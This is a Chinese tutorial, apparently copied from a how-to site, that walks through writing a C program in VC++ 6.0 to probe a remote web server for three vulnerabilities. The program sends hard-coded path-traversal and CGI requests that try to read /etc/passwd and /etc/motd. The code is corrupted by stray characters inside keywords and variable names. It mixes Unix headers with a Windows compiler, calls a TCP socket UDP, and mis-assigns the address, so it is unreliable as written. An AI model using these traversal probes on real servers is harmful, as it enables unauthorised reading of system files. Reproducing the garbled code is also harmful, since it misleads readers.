1、首先打开VC++6.0
2、选择文件,新建
3、选择C++ source file 新建一个空白文档
4、先声明头文件,由于用到DOS函数比较多,所以导入头文件也很多#include <string.h>#include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/param.h> #include <sys/ioctl.h> #include <sys/socket.h> #include <net/if.h> #include <netinet/in.h> #include <net/if_arp.h>
5、定义两个常量#define BUFFSIZE 1024/*定义要检测的漏洞数*/#define MAXHOLE 3
6、写主函数,需要带参数的主函数int main(int argc,char *argv[]) { }
7、主函数内定义变量stru罕铞泱殳ct sockaddr_in address; struct hostent *茑霁酌绡he = (struct hostent *)malloc( sizeof( struct hostent )); int i; int sockfd; char buff[BUFFSIZE]; char *fmt="HTTP/1.1 200 OK";/*定义了指针数组来存放漏洞*/char *hole[MAXHOLE]; hole[0]="GET /../../../../etc/passwd HTTP/1.0\n\n"; hole[1]="GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0\n\n"; hole[2]="GET /cgi-bin/test-cgi?* HTTP/1.0\n\n";
8、由于是远程监测漏洞,所以要建立UDP通信的socketsockfd=socket(AF_INET,SOCK_STREAM,0); address.sin_family=AF_INET; address.sin_port=htons(80); address.sin_addr.s_addr=inet_addr(argv[1]); if ((he=gethostbyname(argv[1]))!=0) //memcpy( (char *)&(address.sin_addr.s_addr) , he->h_addr,he->h_length); address.sin_addr.s_addr=*((struct sockaddr_in *)(he->h_addr));if((address.sin_addr.s_addr=inet_addr(argv[1]))==-1) return 0;
9、 用循环检测漏洞for (i=0;i<MAXHOLE;i++) { if (connect(sockfd,(struct sockaddr*)&address,sizeof(address))==0){ send(sockfd,hole[i],strlen(hole[i]),0); recv(sockfd,buff,sizeof(buff),0); if(strstr(buff,fmt)!=NULL)printf("\nFound :%s\n", hole[i]);} } /*关闭套接字*/close(sockfd); return 0; }
